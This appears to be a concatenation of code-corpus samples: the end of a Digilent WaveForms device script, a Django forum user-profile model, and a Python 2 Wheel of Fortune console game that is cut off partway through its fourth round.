dwf.FDwfAnalogIOChannelNodeSet(hdwf, c_int(0), c_int(1), c_double(1.2))
# master enable
dwf.FDwfAnalogIOEnableSet(hdwf, c_int(True))
dwf.FDwfAnalogIOConfigure(hdwf)
dwf.FDwfDeviceClose(hdwf) | StarcoderdataPython |
1749071 | <filename>spirit/user/models.py
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from datetime import timedelta
from django.db import models
from django.core.urlresolvers import reverse
from django.utils.translation import ugettext_lazy as _
from django.utils import timezone
from django.conf import settings
from ..core.utils.models import AutoSlugField
class UserProfile(models.Model):
user = models.OneToOneField(settings.AUTH_USER_MODEL, verbose_name=_("profile"), related_name='st')
slug = AutoSlugField(populate_from="user.username", db_index=False, blank=True)
location = models.CharField(_("location"), max_length=75, blank=True)
last_seen = models.DateTimeField(_("last seen"), auto_now=True)
last_ip = models.GenericIPAddressField(_("last ip"), blank=True, null=True)
timezone = models.CharField(_("time zone"), max_length=32, default='UTC')
is_administrator = models.BooleanField(_('administrator status'), default=False)
is_moderator = models.BooleanField(_('moderator status'), default=False)
is_verified = models.BooleanField(_('verified'), default=False,
help_text=_('Designates whether the user has verified his '
'account by email or by other means. Un-select this '
'to let the user activate his account.'))
topic_count = models.PositiveIntegerField(_("topic count"), default=0)
comment_count = models.PositiveIntegerField(_("comment count"), default=0)
last_post_hash = models.CharField(_("last post hash"), max_length=32, blank=True)
last_post_on = models.DateTimeField(_("last post on"), null=True, blank=True)
class Meta:
verbose_name = _("forum profile")
verbose_name_plural = _("forum profiles")
def save(self, *args, **kwargs):
if self.user.is_superuser:
self.is_administrator = True
if self.is_administrator:
self.is_moderator = True
super(UserProfile, self).save(*args, **kwargs)
def get_absolute_url(self):
return reverse('spirit:user:detail', kwargs={'pk': self.user.pk, 'slug': self.slug})
def update_post_hash(self, post_hash):
assert self.pk
# Let the DB do the hash
# comparison for atomicity
return bool(UserProfile.objects
.filter(pk=self.pk)
.exclude(
last_post_hash=post_hash,
last_post_on__gte=timezone.now() - timedelta(
minutes=settings.ST_DOUBLE_POST_THRESHOLD_MINUTES))
.update(
last_post_hash=post_hash,
last_post_on=timezone.now()))
| StarcoderdataPython |
3319236 | ##for Raleigh & Grant
##who contributed more than they know
################################################################################
############################## WHEEL OF FORTUNE ################################
################################################################################
import random
import string
WORDLIST_FILENAME = "words.txt"
def load_words():
"""
Returns a list of valid words. Words are strings of lowercase letters.
Depending on the size of the word list, this function may
take a while to finish.
"""
## print "Loading word list from file..."
inFile = open(WORDLIST_FILENAME, 'r', 0)
line = inFile.readline()
wordlist = string.split(line)
## print " ", len(wordlist), "words loaded."
return wordlist
def choose_word(wordlist):
"""
wordlist (list): list of words (strings)
Returns a word from wordlist at random
"""
return random.choice(wordlist)
wordlist = load_words()
def start():
print string.center(("*" * 80), 80)
print string.center(("*" * 80), 80)
print string.center((("*" * 5) + (" " * 70) + ("*" * 5)), 80)
print string.center((("*" * 5) + (" " * 21) + "Welcome to WHEEL OF FORTUNE!" + (" " * 21) + ("*" * 5)), 80)
print string.center((("*" * 5) + (" " * 7) + "I'm your host, <NAME>, with your hostess <NAME>." + (" " * 7) + ("*" * 5)), 80)
print string.center((("*" * 5) + (" " * 70) + ("*" * 5)), 80)
print string.center(("*" * 80), 80)
print string.center(("*" * 80), 80)
playerNames_hum = ["Player 1", "Player 2", "Player 3"]
playerNames_comp = ["<NAME>", "Roger"]
playerOrder_val = [[0, 0], [0, 0], [0, 0]]
rounds = ["first", "second", "third", "fourth"]
gameSetup(playerNames_hum, playerNames_comp, playerOrder_val, rounds)
def gameSetup(playerNames_hum, playerNames_comp, playerOrder_val, rounds):
numPlayers = get_numPlayers()
players = get_playerNames(numPlayers, playerNames_hum, playerNames_comp)
game(players, playerOrder_val)
def game(players, playerOrder_val):
playerOrder = preRound_one(players, playerOrder_val)
## print "playerOrder is:", playerOrder
## print "playerOrder_val is equal to:", playerOrder_val
print string.center(("*" * 80), 80)
print string.center(("*" * 80), 80)
print ""
print string.center("ROUND ONE", 80)
print ""
print string.center(("*" * 80), 80)
print string.center(("*" * 80), 80)
playerOrder_val = round_one(playerOrder, playerOrder_val)
print "At the end of round one, the scores are:", playerOrder_val
print string.center(("*" * 80), 80)
print string.center(("*" * 80), 80)
print string.center("BEGIN ROUND TWO", 80)
print string.center(("*" * 80), 80)
print string.center(("*" * 80), 80)
raw_input("Press 'ENTER' to continue: ")
playerOrder_val = round_two(playerOrder, playerOrder_val)
print string.center(("*" * 80), 80)
print string.center(("*" * 80), 80)
print string.center("BEGIN ROUND THREE", 80)
print string.center(("*" * 80), 80)
print string.center(("*" * 80), 80)
raw_input("Press 'ENTER' to continue: ")
playerOrder_val = round_three(playerOrder, playerOrder_val)
print string.center(("*" * 80), 80)
print string.center(("*" * 80), 80)
print string.center("BEGIN ROUND FOUR", 80)
print string.center(("*" * 80), 80)
print string.center(("*" * 80), 80)
raw_input("Press 'ENTER' to continue: ")
playerOrder_val = round_four(playerOrder, playerOrder_val)
end_game(players)
def preRound_one(players, playerOrder_val):
playerOrder = get_playerOrder(players, playerOrder_val)
return playerOrder
def round_one(playerOrder, playerOrder_val):
## print "playerOrder_val is equal to:", playerOrder_val
game_round = 1
hidden_word = choose_word(wordlist).lower()
playerOrder_val_round = [[0, 0], [0, 0], [0, 0]]
alpha = string.ascii_lowercase
disp_word = "_ " * len(hidden_word)
incom_word = "_" * len(hidden_word)
print "The hidden_word is:", hidden_word
counter = 0
countDown = 11
while countDown > 0:
## for i in range(counter):
## counter -= 1
## print "counter is equal to:", counter
print ""
print "The first round puzzle is:", disp_word
for j in [0, 1, 2, 0, 1, 2, 0, 1, 2, 0]:
## counter -= 1
## print "counter is equal to:", counter
possession = True
if countDown == 0:
break
while possession == True:
countDown -= 1
if countDown == 0:
break
## print "counter is equal to:", counter
selection = 0
if counter > 0:
print disp_word
counter += 1
print ""
print "Remaining letters are:", str(string.upper(alpha))
print ""
selection = get_playerSelection(playerOrder, hidden_word, disp_word, j, playerOrder_val_round)
if selection == 3:
print ""
print "You chose to buy a vowel."
print ""
playerOrder_val_round[j][0] = (playerOrder_val_round[j][0] - 250)
guess = get_guessVowel()
guess = string.lower(guess)
if guess in alpha:
alpha = alpha.replace(guess, "")
else:
print ""
print "Sorry, '" + string.upper(guess) + "' has already been called in this round."
print playerOrder[j + 1] + " now takes possession of The Wheel."
print ""
raw_input(string.center(("-" * 80), 80))
print ""
## possession = False
break
print ""
print string.center(("-" * 80), 80)
print string.center(("Vanna, does the puzzle contain any '" + guess.upper() + "'s?"), 80)
raw_input(string.center(("-" * 80), 80))
print ""
if guess in hidden_word:
for i in range(len(hidden_word)):
if hidden_word[i] == guess:
disp_word = disp_word[0:(i * 2)] + guess + disp_word[((i * 2) + 1):]
incom_word = incom_word[0:i] + guess + incom_word[(i + 1):]
letter_app = 0
for i in range(len(hidden_word)):
if hidden_word[i] == guess:
letter_app += 1
if letter_app == 0 or letter_app == 1:
if letter_app == 0:
print "I'm sorry", playerOrder[j] + ", but there are no '" + guess.upper() + "'s in the puzzle."
print ""
possession = False
break
if letter_app == 1:
print "Good guess,", playerOrder[j] + "! There is 1", guess.upper(), "in the puzzle!"
print ""
print string.center(("-" * 80), 80)
print ""
else:
print "Good guess,", playerOrder[j] + "! There are", letter_app, "'" + guess.upper() + "'s in the puzzle!"
print ""
print string.center(("-" * 80), 80)
print ""
else:
print "I'm sorry", playerOrder[j] + ", but there are no '" + guess.upper() + "'s in the puzzle."
print "Possession of The Wheel passes to " + playerOrder[j + 1] + "."
print ""
possession = False
break
if selection == 1:
prize = get_prize(game_round)
subPrize = prize
if (type(prize) is int) or (prize == "freePlay"):
freePlay_choice = 0
if type(prize) is int:
print ""
print playerOrder[j] + " spun for $" + str(prize) + "!"
print ""
if prize is "freePlay":
print ""
print playerOrder[j], "spun for a FREE PLAY!"
print playerOrder[j] + ", you may solve or guess a letter (including vowels) without penalty."
print ""
selection_freePlay = get_freePlayChoice(playerOrder, j)
subPrize = 500
if selection_freePlay == 1:
guess = get_guessfreePlay()
if selection_freePlay == 2:
guess_word = get_guessWord()
if guess_word == hidden_word:
incom_word = guess_word
possession = True
break
else:
print ""
print "Sorry, that is not the solution to the puzzle."
print "Your Free Play spin, however, means that you keep possession of The Wheel."
print ""
guess = 1
if type(prize) is int:
guess = get_guessConsonant()
if type(guess) == str:
guess = string.lower(guess)
if guess != 1:
if guess in alpha:
alpha = alpha.replace(guess, "")
print ""
print string.center(("-" * 80), 80)
print string.center(("Vanna, does the puzzle contain any '" + guess.upper() + "'s?"), 80)
raw_input(string.center(("-" * 80), 80))
print ""
if guess in hidden_word or prize == "freePlay":
for i in range(len(hidden_word)):
if hidden_word[i] == guess:
disp_word = disp_word[0:(i * 2)] + guess + disp_word[((i * 2) + 1):]
incom_word = incom_word[0:i] + guess + incom_word[(i + 1):]
letter_app = 0
for i in range(len(hidden_word)):
if hidden_word[i] == guess:
letter_app += 1
if letter_app == 0:
print "I'm sorry", playerOrder[j] + ", but there are no '" + guess.upper() + "'s in the puzzle."
if prize == "freePlay":
print "Your Free Play spin, however, means that you keep possession of The Wheel."
print ""
else:
print "Possession of The Wheel passes to " + playerOrder[j + 1] + "."
print ""
print string.center(("-" * 80), 80)
print ""
possession = False
break
if letter_app == 1:
print disp_word
print ""
print "Good guess,", playerOrder[j] + "! There is 1", guess.upper(), "in the puzzle!"
print "That adds $" + str(subPrize) + " to your total prize score!"
print ""
playerOrder_val_round[j][0] = playerOrder_val_round[j][0] + (subPrize * letter_app)
print string.center(("-" * 80), 80)
print ""
print string.center((playerOrder[j] + "'s total prize score is now $" + str(playerOrder_val_round[j][0]) + "!"), 80)
print ""
raw_input(string.center(("-" * 80), 80))
print ""
possession = True
if letter_app >= 2:
print disp_word
print ""
print "Good guess:", playerOrder[j] + "! There are", letter_app, "'" + guess.upper() + "'s in the puzzle!"
print "That adds $" + str(subPrize * letter_app) + " to your total prize score!"
print ""
playerOrder_val_round[j][0] = playerOrder_val_round[j][0] + (subPrize * letter_app)
print string.center(("-" * 80), 80)
print ""
print string.center((playerOrder[j] + "'s total prize score is now $" + str(playerOrder_val_round[j][0]) + "!"), 80)
print ""
raw_input(string.center(("-" * 80), 80))
print ""
possession = True
if incom_word == hidden_word:
break
else:
print "I'm sorry", playerOrder[j] + ", but there are no '" + guess.upper() + "'s in the puzzle."
if prize == "freePlay":
print "Your Free Play spin, however, means that you keep possession of The Wheel."
print ""
else:
print "Possession of The Wheel passes to " + playerOrder[j + 1] + "."
print ""
possession = False
break
else:
print ""
print "Sorry, '" + string.upper(guess) + "' has already been called in this round."
if type(prize) == int:
print playerOrder[j + 1] + " now takes possession of The Wheel."
else:
print "Your Free Play spin, however, means that you keep possession of The Wheel."
print ""
if type(prize) == int:
break
if prize == "bankrupt":
print ""
print playerOrder[j], "spun for BANKRUPT, bringing his total prize for this round to $0."
playerOrder_val_round[j][0] = 0
print "Possession of The Wheel passes to", playerOrder[(j + 1)] + "."
print ""
raw_input(string.center(("-" * 80), 80))
print ""
break
if prize == "loseATurn":
print ""
print playerOrder[j], "spun for LOSE A TURN!"
print "Sorry, " + playerOrder[j] + ". Possession of The Wheel passes to " + playerOrder[j + 1] + "."
print ""
raw_input(string.center(("-" * 80), 80))
print ""
break
if selection == 0:
guess = get_guessWord()
if guess == hidden_word:
incom_word = guess
break
else:
print "Sorry, " + playerOrder[j] + ". That is not the correct puzzle solution."
print "Possession of the Wheel passes to " + playerOrder[j + 1] + "."
print ""
raw_input(string.center(("-" * 80), 80))
break
if incom_word == hidden_word:
## print "j is equal to:", j
playerOrder_val[j][0] = playerOrder_val_round[j][0] + playerOrder_val[j][0]
print "Congratulations,", playerOrder[j] + ". You correctly solved the puzzle:", string.upper(hidden_word) + "."
break
## if incom_word == hidden_word:
## break
break
return playerOrder_val
def round_two(playerOrder, playerOrder_val):
## print "playerOrder_val is equal to:", playerOrder_val
game_round = 1
hidden_word = choose_word(wordlist).lower()
playerOrder_val_round = [[0, 0], [0, 0], [0, 0]]
alpha = string.ascii_lowercase
disp_word = "_ " * len(hidden_word)
incom_word = "_" * len(hidden_word)
## print "The hidden_word is:", hidden_word
counter = 0
countDown = 11
while countDown > 0:
## for i in range(counter):
## counter -= 1
## print "counter is equal to:", counter
print ""
print "The second round puzzle is:", disp_word
for j in [0, 1, 2, 0, 1, 2, 0, 1, 2, 0]:
## counter -= 1
## print "counter is equal to:", counter
possession = True
if countDown == 0:
break
while possession == True:
countDown -= 1
if countDown == 0:
break
## print "counter is equal to:", counter
selection = 0
if counter > 0:
print disp_word
counter += 1
print ""
print "Remaining letters are:", str(string.upper(alpha))
print ""
selection = get_playerSelection(playerOrder, hidden_word, disp_word, j, playerOrder_val_round)
if selection == 3:
print ""
print "You chose to buy a vowel."
print ""
playerOrder_val_round[j][0] = (playerOrder_val_round[j][0] - 250)
guess = get_guessVowel()
guess = string.lower(guess)
if guess in alpha:
alpha = alpha.replace(guess, "")
else:
print ""
print "Sorry, '" + string.upper(guess) + "' has already been called in this round."
print playerOrder[j + 1] + " now takes possession of The Wheel."
print ""
## possession = False
break
print ""
print string.center(("-" * 80), 80)
print string.center(("Vanna, does the puzzle contain any '" + guess.upper() + "'s?"), 80)
raw_input(string.center(("-" * 80), 80))
print ""
if guess in hidden_word:
for i in range(len(hidden_word)):
if hidden_word[i] == guess:
disp_word = disp_word[0:(i * 2)] + guess + disp_word[((i * 2) + 1):]
incom_word = incom_word[0:i] + guess + incom_word[(i + 1):]
letter_app = 0
for i in range(len(hidden_word)):
if hidden_word[i] == guess:
letter_app += 1
if letter_app == 0 or letter_app == 1:
if letter_app == 0:
print "I'm sorry", playerOrder[j] + ", but there are no '" + guess.upper() + "'s in the puzzle."
print ""
possession = False
break
if letter_app == 1:
print "Good guess,", playerOrder[j] + "! There is 1", guess.upper(), "in the puzzle!"
print ""
print string.center(("-" * 80), 80)
print ""
else:
print "Good guess,", playerOrder[j] + "! There are", letter_app, "'" + guess.upper() + "'s in the puzzle!"
print ""
print string.center(("-" * 80), 80)
print ""
else:
print "I'm sorry", playerOrder[j] + ", but there are no '" + guess.upper() + "'s in the puzzle."
print "Possession of The Wheel passes to " + playerOrder[j + 1] + "."
print ""
possession = False
break
if selection == 1:
prize = get_prize(game_round)
subPrize = prize
if (type(prize) is int) or (prize == "freePlay"):
freePlay_choice = 0
if type(prize) is int:
print ""
print playerOrder[j] + " spun for $" + str(prize) + "!"
print ""
if prize is "freePlay":
print ""
print playerOrder[j], "spun for a FREE PLAY!"
print playerOrder[j] + ", you may solve or guess a letter (including vowels) without penalty."
print ""
selection_freePlay = get_freePlayChoice(playerOrder, j)
subPrize = 500
if selection_freePlay == 1:
guess = get_guessfreePlay()
if selection_freePlay == 2:
guess_word = get_guessWord()
if guess_word == hidden_word:
incom_word = guess_word
possession = True
break
else:
print ""
print "Sorry, that is not the solution to the puzzle."
print "Your Free Play spin, however, means that you keep possession of The Wheel."
print ""
guess = 1
if type(prize) is int:
guess = get_guessConsonant()
if type(guess) == str:
guess = string.lower(guess)
if guess != 1:
if guess in alpha:
alpha = alpha.replace(guess, "")
print ""
print string.center(("-" * 80), 80)
print string.center(("Vanna, does the puzzle contain any '" + guess.upper() + "'s?"), 80)
raw_input(string.center(("-" * 80), 80))
print ""
if guess in hidden_word or prize == "freePlay":
for i in range(len(hidden_word)):
if hidden_word[i] == guess:
disp_word = disp_word[0:(i * 2)] + guess + disp_word[((i * 2) + 1):]
incom_word = incom_word[0:i] + guess + incom_word[(i + 1):]
letter_app = 0
for i in range(len(hidden_word)):
if hidden_word[i] == guess:
letter_app += 1
if letter_app == 0:
print "I'm sorry", playerOrder[j] + ", but there are no '" + guess.upper() + "'s in the puzzle."
if prize == "freePlay":
print "Your Free Play spin, however, means that you keep possession of The Wheel."
print ""
else:
print "Possession of The Wheel passes to " + playerOrder[j + 1] + "."
print string.center(("-" * 80), 80)
print ""
possession = False
break
if letter_app == 1:
print disp_word
print ""
print "Good guess,", playerOrder[j] + "! There is 1", guess.upper(), "in the puzzle!"
print "That adds $" + str(subPrize) + " to your total prize score!"
print ""
playerOrder_val_round[j][0] = playerOrder_val_round[j][0] + (subPrize * letter_app)
print string.center(("-" * 80), 80)
print ""
print string.center((playerOrder[j] + "'s total prize score is now $" + str(playerOrder_val_round[j][0]) + "!"), 80)
print ""
raw_input(string.center(("-" * 80), 80))
print ""
possession = True
if letter_app >= 2:
print disp_word
print ""
print "Good guess:", playerOrder[j] + "! There are", letter_app, "'" + guess.upper() + "'s in the puzzle!"
print "That adds $" + str(subPrize * letter_app) + " to your total prize score!"
print ""
playerOrder_val_round[j][0] = playerOrder_val_round[j][0] + (subPrize * letter_app)
print string.center(("-" * 80), 80)
print ""
print string.center((playerOrder[j] + "'s total prize score is now $" + str(playerOrder_val_round[j][0]) + "!"), 80)
print ""
raw_input(string.center(("-" * 80), 80))
print ""
possession = True
if incom_word == hidden_word:
break
else:
print "I'm sorry", playerOrder[j] + ", but there are no '" + guess.upper() + "'s in the puzzle."
if prize == "freePlay":
print "Your Free Play spin, however, means that you keep possession of The Wheel."
print ""
else:
print "Possession of The Wheel passes to " + playerOrder[j] + "."
possession = False
break
else:
print ""
print "Sorry, '" + string.upper(guess) + "' has already been called in this round."
if type(prize) == int:
print playerOrder[j + 1] + " now takes possession of The Wheel."
else:
print "Your Free Play spin, however, means that you keep possession of The Wheel."
print ""
if type(prize) == int:
break
if prize == "bankrupt":
print ""
print playerOrder[j], "spun for BANKRUPT, bringing his total prize for this round to $0."
playerOrder_val_round[j][0] = 0
print "Possession of The Wheel passes to", playerOrder[(j + 1)] + "."
print ""
raw_input(string.center(("-" * 80), 80))
print ""
break
if prize == "loseATurn":
print ""
print playerOrder[j], "spun for LOSE A TURN!"
"Sorry, " + playerOrder[j] + ". Possession of The Wheel passes to " + playerOrder[j + 1] + "."
print ""
raw_input(string.center(("-" * 80), 80))
print ""
break
if selection == 0:
guess = get_guessWord()
if guess == hidden_word:
incom_word = guess
break
else:
print "Sorry, " + playerOrder[j] + ". That is not the correct puzzle solution."
print "Possession of the Wheel passes to " + playerOrder[j + 1] + "."
print ""
raw_input(string.center(("-" * 80), 80))
break
if incom_word == hidden_word:
## print "j is equal to:", j
playerOrder_val[j][0] = playerOrder_val_round[j][0] + playerOrder_val[j][0]
print "Congratulations,", playerOrder[j] + ". You correctly solved the puzzle:", string.upper(hidden_word) + "."
break
## if incom_word == hidden_word:
## break
break
return playerOrder_val
def round_three(playerOrder, playerOrder_val):
## print "playerOrder_val is equal to:", playerOrder_val
game_round = 1
hidden_word = choose_word(wordlist).lower()
playerOrder_val_round = [[0, 0], [0, 0], [0, 0]]
alpha = string.ascii_lowercase
disp_word = "_ " * len(hidden_word)
incom_word = "_" * len(hidden_word)
## print "The hidden_word is:", hidden_word
counter = 0
countDown = 11
while countDown > 0:
## for i in range(counter):
## counter -= 1
## print "counter is equal to:", counter
print ""
print "The third round puzzle is:", disp_word
for j in [0, 1, 2, 0, 1, 2, 0, 1, 2, 0]:
## counter -= 1
## print "counter is equal to:", counter
possession = True
if countDown == 0:
break
while possession == True:
countDown -= 1
if countDown == 0:
break
## print "counter is equal to:", counter
selection = 0
if counter > 0:
print disp_word
counter += 1
print ""
print "Remaining letters are:", str(string.upper(alpha))
print ""
selection = get_playerSelection(playerOrder, hidden_word, disp_word, j, playerOrder_val_round)
if selection == 3:
print ""
print "You chose to buy a vowel."
print ""
playerOrder_val_round[j][0] = (playerOrder_val_round[j][0] - 250)
guess = get_guessVowel()
guess = string.lower(guess)
if guess in alpha:
alpha = alpha.replace(guess, "")
else:
print ""
print "Sorry, '" + string.upper(guess) + "' has already been called in this round."
print playerOrder[j + 1] + " now takes possession of The Wheel."
print ""
## possession = False
break
print ""
print string.center(("-" * 80), 80)
print string.center(("Vanna, does the puzzle contain any '" + guess.upper() + "'s?"), 80)
raw_input(string.center(("-" * 80), 80))
print ""
if guess in hidden_word:
for i in range(len(hidden_word)):
if hidden_word[i] == guess:
disp_word = disp_word[0:(i * 2)] + guess + disp_word[((i * 2) + 1):]
incom_word = incom_word[0:i] + guess + incom_word[(i + 1):]
letter_app = 0
for i in range(len(hidden_word)):
if hidden_word[i] == guess:
letter_app += 1
if letter_app == 0 or letter_app == 1:
if letter_app == 0:
print "I'm sorry", playerOrder[j] + ", but there are no '" + guess.upper() + "'s in the puzzle."
print ""
possession = False
break
if letter_app == 1:
print "Good guess,", playerOrder[j] + "! There is 1", guess.upper(), "in the puzzle!"
print ""
print string.center(("-" * 80), 80)
print ""
else:
print "Good guess,", playerOrder[j] + "! There are", letter_app, "'" + guess.upper() + "'s in the puzzle!"
print ""
print string.center(("-" * 80), 80)
print ""
else:
print "I'm sorry", playerOrder[j] + ", but there are no '" + guess.upper() + "'s in the puzzle."
print "Possession of The Wheel passes to " + playerOrder[j + 1] + "."
print ""
possession = False
break
if selection == 1:
prize = get_prize(game_round)
subPrize = prize
if (type(prize) is int) or (prize == "freePlay"):
freePlay_choice = 0
if type(prize) is int:
print ""
print playerOrder[j] + " spun for $" + str(prize) + "!"
print ""
if prize is "freePlay":
print ""
print playerOrder[j], "spun for a FREE PLAY!"
print playerOrder[j] + ", you may solve or guess a letter (including vowels) without penalty."
print ""
selection_freePlay = get_freePlayChoice(playerOrder, j)
subPrize = 500
if selection_freePlay == 1:
guess = get_guessfreePlay()
if selection_freePlay == 2:
guess_word = get_guessWord()
if guess_word == hidden_word:
incom_word = guess_word
possession = True
break
else:
print ""
print "Sorry, that is not the solution to the puzzle."
print "Your Free Play spin, however, means that you keep possession of The Wheel."
print ""
guess = 1
if type(prize) is int:
guess = get_guessConsonant()
if type(guess) == str:
guess = string.lower(guess)
if guess != 1:
if guess in alpha:
alpha = alpha.replace(guess, "")
print ""
print string.center(("-" * 80), 80)
print string.center(("Vanna, does the puzzle contain any '" + guess.upper() + "'s?"), 80)
raw_input(string.center(("-" * 80), 80))
print ""
if guess in hidden_word or prize == "freePlay":
for i in range(len(hidden_word)):
if hidden_word[i] == guess:
disp_word = disp_word[0:(i * 2)] + guess + disp_word[((i * 2) + 1):]
incom_word = incom_word[0:i] + guess + incom_word[(i + 1):]
letter_app = 0
for i in range(len(hidden_word)):
if hidden_word[i] == guess:
letter_app += 1
if letter_app == 0:
print "I'm sorry", playerOrder[j] + ", but there are no '" + guess.upper() + "'s in the puzzle."
if prize == "freePlay":
print "Your Free Play spin, however, means that you keep possession of The Wheel."
print ""
else:
print "Possession of The Wheel passes to " + playerOrder[j + 1] + "."
print string.center(("-" * 80), 80)
print ""
possession = False
break
if letter_app == 1:
print disp_word
print ""
print "Good guess,", playerOrder[j] + "! There is 1", guess.upper(), "in the puzzle!"
print "That adds $" + str(subPrize) + " to your total prize score!"
print ""
playerOrder_val_round[j][0] = playerOrder_val_round[j][0] + (subPrize * letter_app)
print string.center(("-" * 80), 80)
print ""
print string.center((playerOrder[j] + "'s total prize score is now $" + str(playerOrder_val_round[j][0]) + "!"), 80)
print ""
raw_input(string.center(("-" * 80), 80))
print ""
possession = True
if letter_app >= 2:
print disp_word
print ""
print "Good guess:", playerOrder[j] + "! There are", letter_app, "'" + guess.upper() + "'s in the puzzle!"
print "That adds $" + str(subPrize * letter_app) + " to your total prize score!"
print ""
playerOrder_val_round[j][0] = playerOrder_val_round[j][0] + (subPrize * letter_app)
print string.center(("-" * 80), 80)
print ""
print string.center((playerOrder[j] + "'s total prize score is now $" + str(playerOrder_val_round[j][0]) + "!"), 80)
print ""
raw_input(string.center(("-" * 80), 80))
print ""
possession = True
if incom_word == hidden_word:
break
else:
print "I'm sorry", playerOrder[j] + ", but there are no '" + guess.upper() + "'s in the puzzle."
if prize == "freePlay":
print "Your Free Play spin, however, means that you keep possession of The Wheel."
print ""
else:
print "Possession of The Wheel passes to " + playerOrder[j] + "."
possession = False
break
else:
print ""
print "Sorry, '" + string.upper(guess) + "' has already been called in this round."
if type(prize) == int:
print playerOrder[j + 1] + " now takes possession of The Wheel."
else:
print "Your Free Play spin, however, means that you keep possession of The Wheel."
print ""
if type(prize) == int:
break
if prize == "bankrupt":
print ""
print playerOrder[j], "spun for BANKRUPT, bringing his total prize for this round to $0."
playerOrder_val_round[j][0] = 0
print "Possession of The Wheel passes to", playerOrder[(j + 1)] + "."
print ""
raw_input(string.center(("-" * 80), 80))
print ""
break
if prize == "loseATurn":
print ""
print playerOrder[j], "spun for LOSE A TURN!"
"Sorry, " + playerOrder[j] + ". Possession of The Wheel passes to " + playerOrder[j + 1] + "."
print ""
raw_input(string.center(("-" * 80), 80))
print ""
break
if selection == 0:
guess = get_guessWord()
if guess == hidden_word:
incom_word = guess
break
else:
print "Sorry, " + playerOrder[j] + ". That is not the correct puzzle solution."
print "Possession of the Wheel passes to " + playerOrder[j + 1] + "."
print ""
raw_input(string.center(("-" * 80), 80))
break
if incom_word == hidden_word:
## print "j is equal to:", j
playerOrder_val[j][0] = playerOrder_val_round[j][0] + playerOrder_val[j][0]
print "Congratulations,", playerOrder[j] + ". You correctly solved the puzzle:", string.upper(hidden_word) + "."
break
## if incom_word == hidden_word:
## break
break
return playerOrder_val
def round_four(playerOrder, playerOrder_val):
## print "playerOrder_val is equal to:", playerOrder_val
game_round = 1
hidden_word = choose_word(wordlist).lower()
playerOrder_val_round = [[0, 0], [0, 0], [0, 0]]
alpha = string.ascii_lowercase
disp_word = "_ " * len(hidden_word)
incom_word = "_" * len(hidden_word)
## print "The hidden_word is:", hidden_word
counter = 0
countDown = 11
while countDown > 0:
## for i in range(counter):
## counter -= 1
## print "counter is equal to:", counter
print ""
print "The fourth round puzzle is:", disp_word
for j in [0, 1, 2, 0, 1, 2, 0, 1, 2, 0]:
## counter -= 1
## print "counter is equal to:", counter
possession = True
if countDown == 0:
break
while possession == True:
countDown -= 1
if countDown == 0:
break
## print "counter is equal to:", counter
selection = 0
if counter > 0:
print disp_word
counter += 1
print ""
print "Remaining letters are:", str(string.upper(alpha))
print ""
selection = get_playerSelection(playerOrder, hidden_word, disp_word, j, playerOrder_val_round)
if selection == 3:
print ""
print "You chose to buy a vowel."
print ""
playerOrder_val_round[j][0] = (playerOrder_val_round[j][0] - 250)
guess = get_guessVowel()
guess = string.lower(guess)
if guess in alpha:
alpha = alpha.replace(guess, "")
else:
print ""
print "Sorry, '" + string.upper(guess) + "' has already been called in this round."
print playerOrder[j + 1] + " now takes possession of The Wheel."
print ""
## possession = False
break
print ""
print string.center(("-" * 80), 80)
print string.center(("Vanna, does the puzzle contain any '" + guess.upper() + "'s?"), 80)
raw_input(string.center(("-" * 80), 80))
print ""
if guess in hidden_word:
for i in range(len(hidden_word)):
if hidden_word[i] == guess:
disp_word = disp_word[0:(i * 2)] + guess + disp_word[((i * 2) + 1):]
incom_word = incom_word[0:i] + guess + incom_word[(i + 1):]
letter_app = 0
for i in range(len(hidden_word)):
if hidden_word[i] == guess:
letter_app += 1
if letter_app == 0 or letter_app == 1:
if letter_app == 0:
print "I'm sorry", playerOrder[j] + ", but there are no '" + guess.upper() + "'s in the puzzle."
print ""
possession = False
break
if letter_app == 1:
print "Good guess,", playerOrder[j] + "! There is 1", guess.upper(), "in the puzzle!"
print ""
print string.center(("-" * 80), 80)
print ""
else:
print "Good guess,", playerOrder[j] + "! There are", letter_app, "'" + guess.upper() + "'s in the puzzle!"
print ""
print string.center(("-" * 80), 80)
print ""
else:
print "I'm sorry", playerOrder[j] + ", but there are no '" + guess.upper() + "'s in the puzzle."
print "Possession of The Wheel passes to " + playerOrder[j + 1] + "."
print ""
possession = False
break
if selection == 1:
prize = get_prize(game_round)
subPrize = prize
if (type(prize) is int) or (prize == "freePlay"):
freePlay_choice = 0
if type(prize) is int:
print ""
print playerOrder[j] + " spun for $" + str(prize) + "!"
print ""
if prize is "freePlay":
print ""
print playerOrder[j], "spun for a FREE PLAY!"
print playerOrder[j] + ", you may solve or guess a letter (including vowels) without penalty."
print ""
selection_freePlay = get_freePlayChoice(playerOrder, j)
subPrize = 500
if selection_freePlay == 1:
guess = get_guessfreePlay()
if selection_freePlay == 2:
guess_word = get_guessWord()
if guess_word == hidden_word:
incom_word = guess_word
possession = True
break
else:
print ""
print "Sorry, that is not the solution to the puzzle."
print "Your Free Play spin, however, means that you keep possession of The Wheel."
print ""
guess = 1
if type(prize) is int:
guess = get_guessConsonant()
if type(guess) == str:
guess = string.lower(guess)
if guess != 1:
if guess in alpha:
alpha = alpha.replace(guess, "")
print ""
print string.center(("-" * 80), 80)
print string.center(("Vanna, does the puzzle contain any '" + guess.upper() + "'s?"), 80)
raw_input(string.center(("-" * 80), 80))
print ""
if guess in hidden_word or prize == "freePlay":
for i in range(len(hidden_word)):
if hidden_word[i] == guess:
disp_word = disp_word[0:(i * 2)] + guess + disp_word[((i * 2) + 1):]
incom_word = incom_word[0:i] + guess + incom_word[(i + 1):]
letter_app = 0
for i in range(len(hidden_word)):
if hidden_word[i] == guess:
letter_app += 1
if letter_app == 0:
print "I'm sorry", playerOrder[j] + ", but there are no '" + guess.upper() + "'s in the puzzle."
if prize == "freePlay":
print "Your Free Play spin, however, means that you keep possession of The Wheel."
print ""
else:
print "Possession of The Wheel passes to " + playerOrder[j + 1] + "."
print string.center(("-" * 80), 80)
print ""
possession = False
break
if letter_app == 1:
print disp_word
print ""
print "Good guess,", playerOrder[j] + "! There is 1", guess.upper(), "in the puzzle!"
print "That adds $" + str(subPrize) + " to your total prize score!"
print ""
playerOrder_val_round[j][0] = playerOrder_val_round[j][0] + (subPrize * letter_app)
print string.center(("-" * 80), 80)
print ""
print string.center((playerOrder[j] + "'s total prize score is now $" + str(playerOrder_val_round[j][0]) + "!"), 80)
print ""
raw_input(string.center(("-" * 80), 80))
print ""
possession = True
